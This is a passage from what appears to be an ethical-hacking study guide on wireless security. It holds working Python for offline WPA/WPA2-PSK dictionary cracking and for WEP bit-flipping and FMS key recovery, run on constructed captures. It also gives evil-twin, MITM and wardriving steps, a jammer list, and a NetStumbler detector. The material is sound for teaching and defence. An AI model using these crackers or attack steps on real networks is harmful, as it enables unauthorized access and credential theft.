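def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the '8-63 character passphrase to 256-bit key' step from the text."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """Pairwise Transient Key. KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48].
    Both sides compute it from values exchanged in the clear; only the PMK is secret."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame, ccmp=True):
    """EAPOL-Key MIC over the frame with its MIC field zeroed: HMAC-SHA1 (truncated)
    for key descriptor version 2 (AES/CCMP), HMAC-MD5 for version 1 (TKIP)."""
    return hmac.new(kck, eapol_frame, hashlib.sha1 if ccmp else hashlib.md5).digest()[:16]


@dataclass
class Handshake:
    """What an attacker keeps from a captured four-way handshake."""
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes   # from message 1
    snonce: bytes   # from message 2
    eapol: bytes    # message 2 EAPOL-Key frame with its 16-byte MIC field zeroed
    mic: bytes      # the MIC as transmitted in message 2
    ccmp: bool = True


def check_passphrase(hs, passphrase):
    """One dictionary-attack trial: recompute PMK -> PTK -> MIC and compare."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, hs.ssid),
                     hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
    return hmac.compare_digest(eapol_mic(ptk[:16], hs.eapol, hs.ccmp), hs.mic)


def crack_psk(hs, wordlist):
    """Offline dictionary attack against a captured handshake (what aircrack-ng does)."""
    for candidate in wordlist:
        if 8 <= len(candidate) <= 63 and check_passphrase(hs, candidate):
            return candidate
    return None


def build_handshake(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, ccmp=True):
    """Stand-in for a real capture: produce message 2 the way the station would.
    The EAPOL-Key body is a constructed placeholder (real frames carry more fields)."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    eapol = b"\x02\x03\x00\x75\x02\x01\x0a" + snonce + bytes(16)   # MIC field zeroed
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol,
                     eapol_mic(ptk[:16], eapol, ccmp), ccmp)


# Constructed capture: a home network whose passphrase happens to be in the wordlist.
CAPTURE = build_handshake("correct-horse", "ExampleNet",
                          bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"),
                          bytes(range(32)), bytes(range(32, 64)))
WORDLIST = ["password", "letmein1", "correct-horse", "qwerty123"]
```

Each trial costs 4096 HMAC-SHA1 iterations for the PBKDF2 step, which is why the attack is feasible against short dictionary words but not against a long random passphrase, and why nothing on the wire needs to be touched once the handshake is on disk.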
WEP vs. WPA vs. WPA2

Attribute                   WEP          WPA                            WPA2
Encryption algorithm        RC4          RC4 with TKIP                  AES-CCMP
IV size                     24-bit       48-bit                         48-bit
Encryption key length       40/104-bit   128-bit                        128-bit
Integrity check mechanism   CRC-32       Michael algorithm and CRC-32   AES-CCMP (CBC-MAC)
Initialization Vector (IV)
An initialization vector (IV) is a block of bits that is required to allow a stream cipher or a block
cipher to be executed in any of several streaming modes of operation to produce a unique stream
independent from other streams produced by the same encryption key, without having to go
through a re-keying process. The size of the IV depends on the encryption algorithm and on the
cryptographic protocol in use and is normally as large as the block size of the cipher or as large
as the encryption key. The IV must be known to the recipient of the encrypted information to be
able to decrypt it.
Weak Initialization Vectors
In WEP, the 24-bit Initialization Vector (IV) is prepended to the secret key and the result is
fed to the RC4 Key Scheduling Algorithm. A flaw in this construction, identified by Fluhrer,
Mantin and Shamir, is that for certain "weak" IVs the first byte of key stream depends on a key
byte in a predictable way (with roughly 5% probability). Because the first plaintext byte of every
data frame is the known LLC/SNAP header byte (0xAA), an attacker can recover the first key stream
byte of each frame, collect enough weak IVs, and reveal the secret key byte by byte. The attack
is possible because WEP uses a single, static master key and has no built-in provision for
updating it.
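The WEP construction from the "working of WEP" steps, the CRC-32 bit-flipping weakness from the WEP issues list, and the weak-IV key recovery described here, as one added Python example that is not code from the page or from any tool it lists. The 40-bit key, the IVs and the frame contents are constructed for the demonstration; the only assumption about real traffic is the one the text makes, that every data frame starts with the known byte 0xAA.

```python
import zlib
from collections import Counter


def rc4_ksa(key, rounds=256):
    """RC4 key scheduling. rounds < 256 stops early and returns the partial
    state and j, which is what the FMS attack needs to simulate."""
    S = list(range(256))
    j = 0
    for i in range(rounds):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_keystream(key, n):
    """First n bytes of RC4 output for key."""
    S, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret, iv, data):
    """Frame body = IV (3 bytes, in the clear) || RC4_{IV||secret}(data || ICV)."""
    icv = zlib.crc32(data).to_bytes(4, "little")
    return iv + xor(data + icv, rc4_keystream(iv + secret, len(data) + 4))


def wep_decrypt(secret, frame):
    """Plaintext data, or None when the ICV does not verify."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4_keystream(iv + secret, len(body)))
    data, icv = plain[:-4], plain[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None


def flip_bits(frame, delta):
    """Bit flipping without the key. CRC-32 is affine, so for equal lengths
    crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros): XOR D into the encrypted data
    and XOR crc(D) ^ crc(zeros) into the encrypted ICV; the frame still verifies."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    return iv + xor(body[:n], delta) + xor(body[n:], icv_delta)


def first_keystream_bytes(frames, known_first_byte=0xAA):
    """Known plaintext: LLC/SNAP makes the first data byte 0xAA, so
    ciphertext[0] ^ 0xAA is the first RC4 output byte under that frame's IV."""
    return [(f[:3], f[3] ^ known_first_byte) for f in frames]


def fms_recover_byte(known, samples):
    """FMS voting for key byte A = len(known). Simulate the first A+3 KSA steps
    with IV || known bytes; if the state is 'resolved' (S[1] < A+3 and
    S[1] + S[S[1]] == A+3) it survives the remaining steps about 5% of the time,
    and then the first output byte is S[A+3], giving K[A] = S^-1[out] - j - S[A+3]."""
    A = len(known)
    votes = Counter()
    for iv, out in samples:
        S, j = rc4_ksa(iv + known, rounds=A + 3)
        if S[1] >= A + 3 or (S[1] + S[S[1]]) % 256 != A + 3:
            continue
        votes[(S.index(out) - j - S[A + 3]) % 256] += 1
    return votes.most_common(1)[0][0]


def fms_recover_key(samples, key_len):
    """Recover the key byte by byte; each byte's vote depends on the earlier ones."""
    known = b""
    for _ in range(key_len):
        known += bytes([fms_recover_byte(known, samples)])
    return known


SECRET = bytes.fromhex("1f3a9c07e2")  # constructed 40-bit WEP key
DEMO_FRAME = wep_encrypt(SECRET, b"\x00\x00\x01", b"\xaa\xaa\x03HELLO")


def demo_flip():
    """Turn the encrypted 'HELLO' into 'HELP!' without knowing SECRET."""
    delta = xor(b"\xaa\xaa\x03HELLO", b"\xaa\xaa\x03HELP!")
    return wep_decrypt(SECRET, flip_bits(DEMO_FRAME, delta))


def demo_fms(secret=SECRET):
    """Constructed capture: one frame for every FMS weak IV (A+3, 255 or 254, X)."""
    frames = [wep_encrypt(secret, bytes([a + 3, b, x]), b"\xaa\xaa\x03data")
              for a in range(len(secret)) for b in (254, 255) for x in range(256)]
    return fms_recover_key(first_keystream_bytes(frames), len(secret))
```

Real captures contain far fewer weak IVs per key byte, which is why the aircrack-ng procedure above injects ARP replays to drive up the IV count and why later tools added further IV classes and the PTW statistical attack; the voting structure is the same.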
WEP/WPA cracking tools
The following are WEP/WPA cracking tools:
 WepAttack
 Wesside-ng
 WEPCrack
 ChopChop
 WeDecrypt
 KisMAC
KisMAC is an open-source and free sniffer/scanner application for Mac OS X. It is more
advantageous than MacStumbler / iStumbler / NetStumbler, because it uses monitor mode and
passive scanning. KisMAC supports the 802.11b/g network. It reveals hidden, cloaked, or closed
SSIDs, shows logged in clients, and draws area maps of network coverage.
Elcomsoft Wireless Security Auditor
Network administrators use Elcomsoft Wireless Security Auditor to audit accessible wireless
networks. It has a built-in wireless network sniffer, and it tests the strength of WPA/WPA2-PSK
passwords by attempting to recover them from captured handshakes.
AirSnort
AirSnort is a Linux-based WLAN WEP cracking tool that recovers encryption keys. AirSnort
operates by passively monitoring transmissions. It uses Ciphertext Only Attack and captures
approximately 5 to 10 million packets to decrypt the WEP keys.
WEPcrack
WEPcrack is a wireless network cracking tool that exploits the weak-IV vulnerability in the way
WEP uses the RC4 algorithm. It mainly consists of three tools:
 WeakIVGen: It emulates the encryption output of an 802.11 network to generate the weak IVs
that leak bytes of the secret key used to encrypt the network traffic.
 Prism-getIV: It analyzes captured packets and extracts the IVs whose patterns match those
known to leak the secret key.
 WEPcrack: It takes the weak-IV data collected by WeakIVGen and Prism-getIV and recovers the
encryption key.
Wireless threats
The following are wireless threats:
 Wireless access control attack
 Integrity attack
 Confidentiality attack
 Availability attack
 Authentication attack
Wireless access control attack
The primary goal of a wireless access control attack is to penetrate a network by evading WLAN
access control measures, such as AP MAC filters and 802.1X port access controls. Some
examples of wireless access control attacks are as follows:
 Wardriving: In this attack, the attacker discovers wireless LANs by listening to beacons or
sending probe requests. This provides a launch point for further attacks.
 Rogue access points: In this attack, the attacker installs an unsecured access point inside
the firewall to create an open backdoor into a trusted network.
 Ad hoc associations: In this attack, the attacker connects directly to an unsecured station
to bypass AP security or to attack the station.
 MAC spoofing: In this attack, the attacker reconfigures their own MAC address to masquerade
as an authorized AP or station.
 Promiscuous client: It is similar to an evil twin attack. The difference is that a promiscuous
client does not rely on fooling a user with a free unsecured network; it forces the user's device
to connect to the unsecured network, for example by offering a stronger signal.
 Client mis-association: In this attack, the attacker sets up a rogue access point outside the
corporate network and allows users to connect to it, bypassing the corporate security policies.
 Unauthorized association: In this attack, the attacker infects the victim's system and
activates a soft access point. This gives the attacker an unauthorized connection into the
enterprise network.
 AP misconfiguration: Access points are configured to broadcast their SSID to authorized
users, and some network administrators incorrectly use the SSID as a password to verify
authorized users. In this attack, an intruder learns the SSID from the broadcast and connects
to the access point. Relying on SSID broadcasting as an access control is a configuration error.
Integrity attack
An integrity attack sends forged control, management or data frames over a wireless network in
order to mislead the recipient or to enable another type of attack. Some examples of integrity
attacks are as follows:
 Data frame injection: In this attack, the attacker crafts and sends forged 802.11 frames.
 WEP injection: In this attack, the attacker recovers the WEP key or a key stream with cracking
tools and uses it to inject forged encrypted frames.
 Data replay: In this attack, the attacker captures 802.11 data frames for later replay.
 Initialization vector replay attack: In this attack, a known plaintext is sent to an observable
WLAN client. The attacker sniffs the resulting ciphertext, XORs it with the known plaintext to
obtain the key stream for that IV, and then reuses and extends this key stream to inject forged
frames into the network.
 Bit-flipping attack: In this attack, the attacker tampers with the payload of the frame in
order to modify the higher layer packet.
 EAP replay: In this attack, the attacker captures 802.1X Extensible Authentication Protocol
messages for later replay.
 RADIUS replay: In this attack, the attacker captures RADIUS Access-Accept or Access-Reject
messages for later replay.
 Virus: It is a computer program that can copy itself and infect a computer without the
permission or knowledge of the owner.
Confidentiality attack
A confidentiality attack intercepts private information sent over wireless associations. The
information may be in cleartext, or encrypted by 802.11 or higher layer protocols. Some examples
of confidentiality attacks are as follows:
 Eavesdropping: It is the process of listening to private conversations and network traffic to
gain confidential information.
 Traffic analysis: It is the process of identifying communication patterns and participants by
monitoring transmissions.
 Evil twin AP: It is the process of masquerading as an authorized AP by beaconing its SSID to
lure users. A laptop with Internet connectivity (3G or a wired connection) and a mini access
point are required to set up an evil twin. Take the following steps to set up an evil twin:
1. Enable Internet Connection Sharing in Windows 7 or Internet Sharing in Mac OS X.
2. Broadcast your Wi-Fi connection under the target SSID and capture passwords by running a
sniffer program on the shared interface.
 Masquerading: It is the process of impersonating an authorized user in order to gain specific
unauthorized privileges.
 Cracking WEP key: It is the process of recovering a WEP key by capturing data using a passive
or active method.
 Man-in-the-middle attack: It is the process of intercepting TCP sessions or SSH/SSL tunnels
using MITM tools on an evil twin AP.
 Session hijacking: It refers to the exploitation of a valid computer session to gain
unauthorized access to information or services in a computer system.
 Honeypot access point: Attackers set up a honeypot access point with default SSIDs, hotspot
SSIDs, or corporate SSIDs. Clients automatically connect to this AP, which then executes various
attacks on the client.
Evil twin phishing
Evil twin phishing is the wireless version of the phishing scam. In this attack, an attacker
fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a
legitimate provider. The attacker uses a bogus base station that victims connect to over Wi-Fi.
By imitating the name of a legitimate wireless provider, the attacker fools people into trusting
the Internet service being provided. When the users log into bank or e-mail accounts, the
phisher has access to the entire transaction, since it is sent through the attacker's equipment.
Unwitting web users are also invited to log into the attacker's server with bogus login prompts,
tempting them to give away sensitive information such as usernames and passwords. Often users are
unaware they have been duped until well after the incident has occurred. Users think they have
connected to a legitimate wireless hotspot when in fact they have been tricked into connecting to
the attacker's base station. The attacker jams or outcompetes the connection to the legitimate
base station by transmitting a stronger signal in proximity to the wireless client, thereby
becoming an "evil twin".
Availability attack
The primary goal of an availability attack is to prevent legitimate users from accessing resources
in a wireless network. Some examples of availability attacks are as follows:
 Disassociation attack: In this attack, the attacker destroys the connectivity between a
station and an access point with forged disassociation frames.
 ARP cache poisoning attack: In this attack, the attacker sniffs data and sends spoofed ARP
messages on the LAN, so that data intended for the router or another host is delivered to the
attacker instead.
 Power saving attack: In this attack, the attacker uses forged Traffic Indication Map (TIM)
messages to fool the client into entering the sleep state that was designed for power saving,
so that it misses its buffered traffic.
 Access point theft: In this attack, the attacker physically removes an access point from a
public place.
 DoS attack: In this attack, the attacker makes a computer resource unavailable to its intended
users.
 Beacon flood: In this attack, the attacker generates a large number of counterfeit 802.11
beacons, making it difficult for stations to find a legitimate access point.
 Authenticate flood: In this attack, the attacker sends forged authentication or association
frames from random MAC addresses to fill the target AP's association table.
 De-authenticate flood: In this attack, the attacker disconnects users from an access point by
flooding stations with forged disassociation or deauthentication frames.
 TKIP MIC exploit: In this attack, the attacker suspends WLAN service by generating invalid
TKIP data to exceed the target AP's MIC error threshold, which triggers TKIP countermeasures.
 EAP-failure: In this attack, the attacker observes a valid 802.1X EAP exchange and sends a
forged EAP-Failure message to the station.
 Routing attack: Attacks on the routing infrastructure behind the WLAN, including
eavesdropping, hijacking, and DoS.
Authentication attack
The primary goal of an authentication attack is to gain access to unauthorized network resources
by misusing the identity of Wi-Fi clients, their personal information, login credentials, etc.
Some examples of authentication attacks are as follows:
 Application login theft: In this attack, the attacker captures the user's login credentials
from cleartext application protocols.
 PSK cracking: In this attack, the attacker uses a dictionary tool to recover a WPA/WPA2 PSK
from captured key handshake frames.
 Shared key guessing: In this attack, the attacker performs 802.11 shared key authentication
using vendor default, guessed, or cracked WEP keys.
 Domain login cracking: In this attack, the attacker uses a brute force or dictionary tool to
recover user credentials by cracking captured NetBIOS/NTLM password hashes.
 Identity theft: In this attack, the attacker captures a user's identity from cleartext 802.1X
EAP identity response packets.
 Password speculation: In this attack, the attacker performs 802.1X authentication attempts to
guess the user's password using a captured identity.
 LEAP cracking: In this attack, the attacker recovers a user's credentials from captured 802.1X
LEAP packets by cracking the NT password hash with a dictionary attack tool.
 VPN login cracking: In this attack, the attacker runs a brute force attack on VPN
authentication protocols to recover a user's credentials.
Rogue access point attack
A rogue AP (rogue access point) is a wireless access point that has either been installed on a
secure company network without explicit authorization from a local network administrator, or
has been created to allow a cracker to conduct a man-in-the-middle attack. A rogue access point
creates a security threat to large organizations because anyone with access to the premises can
maliciously install an inexpensive wireless router that can allow access to a secure network to
unauthorized parties. Rogue access points do not employ mutual authentication.
Man-in-the-middle attack
In a wireless man-in-the-middle attack, the attacker lures the victim's laptop into associating
with a fake WLAN Access Point (AP) under the attacker's control, so that all of the victim's
traffic passes through the attacker. In the Bluetooth variant, the attacker uses a device that
receives Bluetooth packets in promiscuous mode, first records a Bluetooth session, and then sends
forged or replayed packets to the victim's mobile phone and laptop. The following steps set up the
wireless variant using Aircrack-ng:
1. Put the card into monitor mode with airmon-ng and start airodump-ng to discover SSIDs and
clients on the interface.
2. Deauthenticate the client using aireplay-ng so that it reconnects, and associate your own
wireless card with the target AP using aireplay-ng.
Wireless ARP poisoning attack
Normally, wireless traffic flows between a user's wireless laptop and Access Point B. An attacker
takes the following steps to perform the wireless ARP poisoning attack:
1. The attacker spoofs the MAC address of the user's wireless laptop and authenticates to Access
Point A.
2. Access Point A sends updated MAC address information to the network routers and switches,
which update their routing and switching tables.
3. Traffic from the network backbone destined for the user's system is now delivered to Access
Point A (and the attacker) and is no longer sent to Access Point B.
Unauthorized association
Soft access points are useful in providing unauthorized association. Soft access points are client
cards or embedded WLAN radios in some PDAs and laptops. They can be generated
inadvertently or via a virus program. Attackers infect the machine of the victim and activate soft
access points. This facilitates them to make an unauthorized connection to the enterprise
network. Instead of connecting to an enterprise network through the actual access point, attackers
connect to the enterprise network through soft access points.
PDA
Personal digital assistant (PDA) is a term for any small mobile hand-held device that provides
computing and information storage and retrieval capabilities for business or personal use such as
keeping schedule calendars and address book information. Most PDAs have a small keyboard.
Some PDAs have an electronically sensitive pad that accepts handwriting.
Ad hoc network
Ad hoc is a basic topology of a wireless network. An ad hoc network consists of two or more
wireless devices that communicate directly with each other. The wireless local area network
(WLAN) network interface adapters in the wireless devices generate omni-directional signals
within a limited range called the basic service area (BSA). When two wireless devices come within
range of each other, they immediately form a two-node network and are able to communicate with
each other.
An ad hoc network is non-transitive: two devices that can each reach a third device cannot
necessarily reach each other.
Ad hoc connection attack
Wi-Fi clients communicate directly through an ad hoc mode that does not need an AP to relay
packets. Ad hoc mode is inherently insecure. It does not provide strong authentication and
encryption. Hence, attackers can easily connect to and compromise the enterprise client working
in ad hoc mode.
Jamming
Jamming is a denial-of-service attack on the radio medium that is used to compromise a wireless
environment. It denies service to authorized users, as legitimate traffic is drowned out by the
overwhelming illegitimate transmissions on the same frequencies. With the help of some tools, an
attacker can easily jam the 2.4 GHz band in a way that drops the signal to a level where the
wireless networks can no longer function. Some widely used consumer products, such as cordless
phones, baby monitors, and Bluetooth-enabled devices, are also capable of interrupting the signal
of a wireless network and degrading traffic. The following are Wi-Fi jamming devices:

Wi-Fi jamming device   Description
MGT-P6 GPS Jammer      Range: 10~20 meters, 4 antennas, 3G: 2110~2170 MHz, Wi-Fi/Bluetooth:
                       2400~2485 MHz
MGT-02 Jammer          Range: 20~50 meters, 4 antennas
MGT-MP200 Jammer       Range: 50~75 m, barrage + DDS sweep jamming 20 to 2500 MHz,
                       omnidirectional antennas
MGT-03 Jammer          Range: 0~40 meters, 4 antennas
MGT-P6 WiFi Jammer     Range: 10~20 meters, iDEN/CDMA/GSM: 850~960 MHz, DCS/PCS: 1805~1990 MHz,
                       3G: 2110~2170 MHz, Wi-Fi/Bluetooth: 2400~2485 MHz, 4 antennas
MGT-P3x13 Jammer       Range: 50~200 meters, 3 frequency bands jammed
Mobile phone jammer
A mobile phone jammer is an instrument used to prevent cellular phones from receiving signals
from or transmitting signals to base stations. When used, the jammer effectively disables cellular
phones. These devices can be used in practically any location, but are found primarily in places
where a phone call would be particularly disruptive because silence is expected. It blocks cell
phone use by sending out radio waves along the same frequencies that cellular phones use. This
causes enough interference with the communication between cell phones and towers to render
the phones unusable. On most retail phones, the network would simply appear out of range.
Email jamming
Email jamming is the use of sensitive words in e-mails to jam the authorities that listen in on
them by providing a form of a red herring and an intentional annoyance. In this attack, the
attacker deliberately includes "sensitive" words and phrases in otherwise innocuous emails to
ensure that these are picked up by the monitoring systems. As a result, the senders of these
emails will eventually be added to a "harmless" list and their emails will be no longer
intercepted; hence, it will allow them to regain some privacy.
WAP
A Wireless Access Point (WAP, or AP) is a communication device that is capable of both
transmitting and receiving signals in a wireless LAN. This unit is connected to servers or
directly to a network and other devices using a standard cabled network protocol.
WTLS
Wireless Transport Layer Security (WTLS) is the security layer of the Wireless Application
Protocol (WAP) stack (here WAP is the protocol suite for mobile devices, not an access point),
and it is specifically designed for a wireless environment. It provides privacy, data integrity,
and authentication for client-server communications over a wireless network. WTLS ensures that a
client and server are authenticated so that wireless transactions remain secure and the connection
is encrypted. WTLS is required because the wireless link layer alone does not provide end-to-end
security.
WEP
Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks (WLANs). It
has two components, i.e., authentication and encryption. WEP encrypts data on a wireless network
by using a fixed secret key shared by all stations. WEP incorporates a CRC-32 checksum in each
frame to detect modification, but because the checksum is linear it does not protect against
attacks that modify frames or recover the key stream.
IEEE 802.1X Authentication
The IEEE 802.1X standard defines a method of authenticating and authorizing users to connect to
an IEEE 802 LAN. It blocks users from accessing the network if authentication fails. IEEE 802.1X
supports the Extensible Authentication Protocol-Transport Layer Security (EAP-TLS) and Protected
EAP-Microsoft Challenge Handshake Authentication Protocol version 2 (PEAP-MS-CHAP v2) methods,
among others. In an IEEE 802.1X authentication system, an access point receives a connection
request from a wireless client and forwards the request to the RADIUS server. The RADIUS server
then uses a directory such as the Active Directory database to determine whether the client
should be granted access to the network.
Shared Key Authentication
Shared Key is an authentication method used by wireless LANs that follow the IEEE 802.11
standard. Wireless devices authenticate each other by using a secret key that is held by both
devices. Shared Key authentication is not very secure, as all the computers in the basic service
set (BSS) use the same key, so any security lapse on one computer can compromise the security of
the entire BSS. The WEP algorithm must be implemented to enable Shared Key authentication, and
the exchange itself is weak: the AP sends a cleartext challenge and the station returns it
WEP-encrypted, so a sniffer obtains a known plaintext/ciphertext pair and thus the key stream for
that IV, which is enough to forge a valid response without knowing the key.
15.3 Understand wireless hacking methodology, and assess wireless hacking tools
Exam Focus: Understand wireless hacking methodology, and assess wireless hacking tools.
Objective includes:
 Understand wireless hacking methodology.
 Assess wireless hacking tools.
Wireless hacking methodology
The wireless hacking methodology is used to gain unauthorized access to network resources by
compromising a Wi-Fi network.
The following is the wireless hacking methodology:
 Wi-Fi discovery
 GPS mapping
 Wireless traffic analysis
 Launch wireless attacks
 Crack Wi-Fi encryption
Finding Wi-Fi networks for attacks
An attacker checks the potential networks that are in his range to determine the best one to
attack. Use a Wi-Fi enabled laptop with a wireless discovery tool installed to map out active
wireless networks. A laptop with Wi-Fi card, external Wi-Fi antenna, and network discovery
programs can be used to discover Wi-Fi networks.
Footprint the wireless network
Discovering and footprinting the wireless networks, in an active or a passive way, is the first
step of an attack on a wireless network. The following are footprinting methods:
 Passive method: This method detects the existence of an AP by sniffing packets from the
airwaves without transmitting anything. It reveals the APs, their SSIDs, and the wireless clients
that are live.
 Active method: In this method, the attacker's wireless device sends a probe request with the
SSID to check whether the AP responds or not. If the device does not know the SSID, it sends a
probe request with an empty SSID (a broadcast probe), to which APs that are not cloaked reply.
Wi-Fi discovery tools
The following are Wi-Fi discovery tools:
 WiFi Hopper
 Wavestumbler
 iStumbler
 WiFinder
 Meraki WiFi Stumbler
 Wellenreiter
 AirCheck Wi-Fi Tester
 AirRadar 2
 inSSIDer
 NetSurveyor
 NetStumbler
 Vistumbler
 WirelessMon
NetSurveyor
NetSurveyor is an 802.11 network discovery tool used to collect information about adjacent
wireless access points in real time and display this information in an advantageous way. The data
is displayed using various different diagnostic views and charts. Data can be recorded for later
use. Generally, NetSurveyor generates reports in Adobe PDF format.
NetStumbler
NetStumbler is a Windows-based tool that is used for the detection of wireless LANs using the
IEEE 802.11a, 802.11b, and 802.11g standards. It detects wireless networks and marks their
relative position with a GPS. It actively sends 802.11 Probe Requests to the broadcast
destination address. When NetStumbler is connected to a GPS, it records a GPS coordinate for the
highest signal strength found at each access point. The main features of NetStumbler are as
follows:
 It displays the signal strength of a wireless network, MAC address, SSID, channel details, etc.
 It is commonly used for:
1. War driving
2. Detecting unauthorized access points
3. Detecting causes of interference on a WLAN
4. WEP ICV error tracking
5. Making graphs and alarms on 802.11 data, including signal strength
How to detect NetStumbler and identify it?
NetStumbler's probe traffic carries an LLC/SNAP header with the organizationally unique
identifier (OUI) 0x00601d and a protocol identifier (PID) of 0x0001. It also uses a data payload
size of 58 bytes containing a unique string that can be used to identify the version of
NetStumbler. For example, version 3.2.0 carries 'Flurble gronk bloopit, bnip Frundletrune',
version 3.2.3 has the payload string 'All your 802.11b are belong to us', and 3.3.0 has a payload
string that is intentionally left blank. Hence, with the help of these fingerprints, a network
administrator can not only detect NetStumbler activity but also identify the version of
NetStumbler being used by an attacker.
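The fingerprint above as detection logic, written as an added Python example (not code from the page or from any wireless IDS). The frames it runs over are constructed LLC/SNAP bodies; in practice the input would be the body of each captured 802.11 data frame.

```python
NETSTUMBLER_OUI = bytes.fromhex("00601d")
NETSTUMBLER_PID = bytes.fromhex("0001")
NETSTUMBLER_PAYLOAD_LEN = 58
PAYLOAD_STRINGS = {
    b"Flurble gronk bloopit, bnip Frundletrune": "3.2.0",
    b"All your 802.11b are belong to us": "3.2.3",
    b"": "3.3.0",  # 3.3.0 leaves the payload blank
}


def parse_llc_snap(frame_body):
    """Split an LLC/SNAP-encapsulated 802.11 data frame body into (oui, pid, payload).
    Returns None if it is not a SNAP frame (DSAP/SSAP 0xAA, control 0x03)."""
    if len(frame_body) < 8 or frame_body[:3] != b"\xaa\xaa\x03":
        return None
    return frame_body[3:6], frame_body[6:8], frame_body[8:]


def fingerprint_netstumbler(frame_body):
    """Return the NetStumbler version string, 'unknown' for an unrecognised
    NetStumbler payload, or None if the frame is not NetStumbler traffic."""
    parsed = parse_llc_snap(frame_body)
    if parsed is None:
        return None
    oui, pid, payload = parsed
    if oui != NETSTUMBLER_OUI or pid != NETSTUMBLER_PID or len(payload) != NETSTUMBLER_PAYLOAD_LEN:
        return None
    return PAYLOAD_STRINGS.get(payload.rstrip(b"\x00"), "unknown")


def scan_capture(frames):
    """Run the detector over a capture; returns (frame index, version) per hit."""
    hits = []
    for index, frame in enumerate(frames):
        version = fingerprint_netstumbler(frame)
        if version is not None:
            hits.append((index, version))
    return hits


def make_netstumbler_frame(marker):
    """Constructed sample: NetStumbler's SNAP header and 58-byte zero-padded payload."""
    return (b"\xaa\xaa\x03" + NETSTUMBLER_OUI + NETSTUMBLER_PID
            + marker.ljust(NETSTUMBLER_PAYLOAD_LEN, b"\x00"))


# Constructed capture: one ordinary IPv4 frame, two NetStumbler probes, one near miss.
SAMPLE_FRAMES = [
    b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + bytes(20),                     # EtherType 0x0800
    make_netstumbler_frame(b"All your 802.11b are belong to us"),
    make_netstumbler_frame(b""),
    b"\xaa\xaa\x03" + NETSTUMBLER_OUI + NETSTUMBLER_PID + bytes(10),    # wrong payload size
]
```

Matching on the OUI/PID pair and the fixed payload length, rather than on the strings alone, keeps the detector useful for versions whose marker string is not in the table: those are reported as "unknown" rather than missed.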
Vistumbler
Vistumbler is a wireless network scanner used to find out wireless access points. It is written in
AutoIT for Vista, Windows 7, and Windows 8. Vistumbler uses the 'netsh wlan show networks
mode=bssid' Vista command to get wireless information. It supports GPS and live Google Earth
tracking.
WirelessMon
WirelessMon is a tool used to monitor the status of a wireless Wi-Fi adapter and collect
information about nearby wireless access points and hot spots in real time. It logs all wireless
information that it has collected into a file for archival purposes and future reference.
GPS mapping
An attacker creates a map of discovered Wi-Fi networks and uses statistics gathered by Wi-Fi
discovery tools to create a database. GPS is used for tracking the location of the discovered WiFi networks and uploading the coordinates to sites such as WIGLE.
WIGLE
WIGLE (Wireless Geographic Logging Engine) is a GPS mapping tool. It is a Website used to
collect information about various wireless hotspots around the world. Users can register on this
site and upload hotspot data, such as GPS coordinates, SSID, MAC address, and the encryption
type used on the hotspots discovered.
Discover Wi-Fi network using Wardriving
Take the following steps to discover Wi-Fi network using Wardriving:
1. Register with WIGLE and download map packs of your area in order to view the plotted
access points on a geographic map.
2. Connect the antenna and GPS device to the laptop through a USB serial adapter and board
a car.
3. Install and launch NetStumbler and WIGLE client software and turn on the GPS device.
4. Drive the car at a speed of 35 mph or below.
5. Capture and save the NetStumbler log file that includes GPS coordinates of the access
points. Upload this log file to WIGLE. This will then automatically plot the points onto a
map.
Wireless traffic analysis
An attacker can identify vulnerabilities and susceptible victims in a target wireless network by
performing wireless traffic analysis. Wireless traffic analysis is helpful in determining the
strategy that is appropriate for a successful attack. Wireless packets can be easily sniffed and
analyzed as traffic over the air is not serialized. The attacker analyzes a wireless network in order
to determine broadcast SSID, presence of multiple access points, possibility of recovering
SSIDs, authentication method used, and WLAN encryption algorithm.
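The survey described above (broadcast SSID, multiple access points, cloaked SSIDs, authentication method and encryption algorithm) is what a beacon parser extracts. The following is an added example, not code from the original text or any of the tools it names: it parses raw 802.11 beacon frames, reads the privacy bit, the SSID element (flagging cloaked SSIDs) and the RSN or vendor WPA element, and reports which SSIDs are served by more than one BSSID. It assumes frames as a monitor-mode capture delivers them (24-byte MAC header plus body); the sample beacons, BSSIDs and SSIDs are constructed.

```python
"""Passive beacon survey: SSID (including cloaked ones), BSSID, and the security
mode advertised in the capability field and the RSN/WPA elements.

Added example with constructed beacons, not code from the original text. It
assumes raw beacon frames (24-byte MAC header plus body) as delivered by a
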